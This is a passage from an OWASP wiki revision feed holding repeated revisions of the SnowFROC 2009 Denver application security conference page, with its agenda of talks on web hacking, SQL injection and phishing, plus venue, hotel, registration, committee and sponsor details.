 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP has negotiated discounted rates with the Hotel Teatro.  Rooms under the SnowFROC rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC.  The discounted rate will be available until Monday, March 2.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?f=q&amp;amp;hl=en&amp;amp;q=tivoli+denver&amp;amp;ie=UTF8&amp;amp;ll=39.74785,-104.990931&amp;amp;spn=0.040189,0.061626&amp;amp;z=14&amp;amp;iwloc=A map].&lt;br /&gt;
&lt;br /&gt;
By taxi:&lt;br /&gt;
*taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=55332</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=55332"/>
				<updated>2009-02-23T22:29:12Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* Accommodations */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP has negotiated discounted rates with the Hotel Teatro.  Rooms under the SnowFROC group rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room under the discounted rate, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC.  The discounted rate will be available until Monday, March 2.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?f=q&amp;amp;hl=en&amp;amp;q=tivoli+denver&amp;amp;ie=UTF8&amp;amp;ll=39.74785,-104.990931&amp;amp;spn=0.040189,0.061626&amp;amp;z=14&amp;amp;iwloc=A map].&lt;br /&gt;
&lt;br /&gt;
By taxi:&lt;br /&gt;
*taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=55331</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=55331"/>
				<updated>2009-02-23T22:28:57Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* Accommodations */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
